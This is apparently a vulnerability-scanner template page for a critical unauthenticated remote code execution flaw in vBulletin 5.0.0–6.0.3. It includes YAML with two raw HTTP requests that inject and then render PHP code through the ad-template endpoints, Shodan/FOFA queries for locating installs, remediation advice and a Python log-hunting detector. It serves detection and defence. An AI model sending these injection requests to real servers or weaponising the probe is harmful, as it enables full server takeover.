vBulletin replaceAdTemplate - Remote Code Execution
vbulletin-replacead-rce
Verified
Description
vBulletin versions 5.0.0 through 6.0.3 contain a Remote Code Execution (RCE) vulnerability in the ajax/api/ad/replaceAdTemplate endpoint. This flaw arises from improper use of PHP's Reflection API, allowing unauthenticated attackers to invoke protected controller methods. By injecting a crafted <vb:if> conditional that executes arbitrary PHP code via passthru($_POST[<param>]), and triggering it with a second request to ajax/render/ad_<location>, attackers can run arbitrary commands on the server as the webserver user.
Severity
Critical
CVSS Score
10
Affected Product
vbulletin
Published Date
May 24, 2025
Template Author
dhiyaneshdk, chocapikk
vbulletin-replacead-rce.yaml
id: vbulletin-replacead-rce

info:
  name: vBulletin replaceAdTemplate - Remote Code Execution
  author: DhiyaneshDK, Chocapikk
  severity: critical
  description: |
    vBulletin versions 5.0.0 through 6.0.3 contain a Remote Code Execution (RCE) vulnerability in the ajax/api/ad/replaceAdTemplate endpoint. This flaw arises from improper use of PHP's Reflection API, allowing unauthenticated attackers to invoke protected controller methods. By injecting a crafted <vb:if> conditional that executes arbitrary PHP code via passthru($_POST[<param>]), and triggering it with a second request to ajax/render/ad_<location>, attackers can run arbitrary commands on the server as the webserver user.
  impact: |
    Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
  remediation: |
    Upgrade to vBulletin 6.0.4+ and apply the official patch to restrict access to protected controller methods and secure the ajax/api/ad/replaceAdTemplate endpoint.
  reference:
    - https://karmainsecurity.com/pocs/vBulletin-replaceAdTemplate-RCE.php
    - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48828
  classification:
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-48827, CVE-2025-48828
    cwe-id: CWE-424
  metadata:
    verified: true
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    fofa-query: app="vBulletin"
    shodan-query: http.component:"vBulletin"
  tags: cve,cve2025,rce,vbulletin,intrusive

variables:
  rand_string: "{{to_lower(rand_base(5))}}"
  rand_value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location={{rand_string}}&template=<vb:if condition='"var_dump"("{{rand_value}}")'></vb:if>

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'string(5)','{{rand_value}}')
        condition: and

  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        routestring=ajax/render/ad_{{rand_string}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'string(5)','{{rand_value}}')
        condition: and
# digest: 4a0a00473045022100bea79f305c0a04204c85204dc770aa07bbdb4a16ada12ca5a7a3a0180d27be0d022017bbeb5c40deb616bb74977e0e74e707345dee71a7cc69737eb3d722fc4f0625:922c64590222798bb761d5b6d8e72950
10.0 Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2025-48827, cve-2025-48828
CWE ID:
cwe-424
Remediation Steps
Upgrade to vBulletin 6.0.4+ and apply the official patch to restrict access to protected controller methods and secure the ajax/api/ad/replaceAdTemplate endpoint.
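Until the upgrade is in place, the two-request pattern from the description can be hunted for in request logs. The following is an added example, not part of the original template or of vBulletin: it assumes records that include the POST body (plain access logs usually omit it), and the record layout, function name and sample entries are constructed.

```python
from urllib.parse import parse_qs

WRITE_ROUTE = "ajax/api/ad/replaceadtemplate"   # compared case-insensitively
RENDER_PREFIX = "ajax/render/ad_"

# Constructed sample records: (client_ip, method, path, raw_body), as a WAF or
# reverse proxy with body logging might emit them. Not real traffic.
SAMPLE_RECORDS = [
    ("198.51.100.7", "POST", "/",
     "routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=abcde"
     "&template=%3Cvb%3Aif+condition%3D%27...%27%3E%3C%2Fvb%3Aif%3E"),
    ("203.0.113.20", "GET", "/forum/", ""),
    ("198.51.100.7", "POST", "/", "routestring=ajax/render/ad_abcde"),
]


def find_alerts(records):
    """Flag replaceAdTemplate writes and later renders of the written ad location."""
    written = set()   # ad locations seen in a replaceAdTemplate request
    alerts = []
    for idx, (client, _method, _path, body) in enumerate(records):
        params = {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}
        route = params.get("routestring", "").strip("/").lower()
        if route == WRITE_ROUTE:
            # The method behind this route is protected, so any hit deserves
            # review; a <vb:if> conditional in the template raises the severity.
            location = params.get("location", "").lower()
            conditional = "<vb:if" in params.get("template", "").lower()
            written.add(location)
            alerts.append({"record": idx, "client": client, "stage": "template-write",
                           "location": location,
                           "severity": "critical" if conditional else "high"})
        elif route.startswith(RENDER_PREFIX):
            # Correlate on location, not client: the trigger may come from another IP.
            location = route[len(RENDER_PREFIX):]
            if location in written:
                alerts.append({"record": idx, "client": client, "stage": "template-render",
                               "location": location, "severity": "critical"})
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_RECORDS):
        print(alert)
```

A render of an ad location with no earlier replaceAdTemplate write in the same window is not flagged, which keeps ordinary ad rendering out of the alert stream.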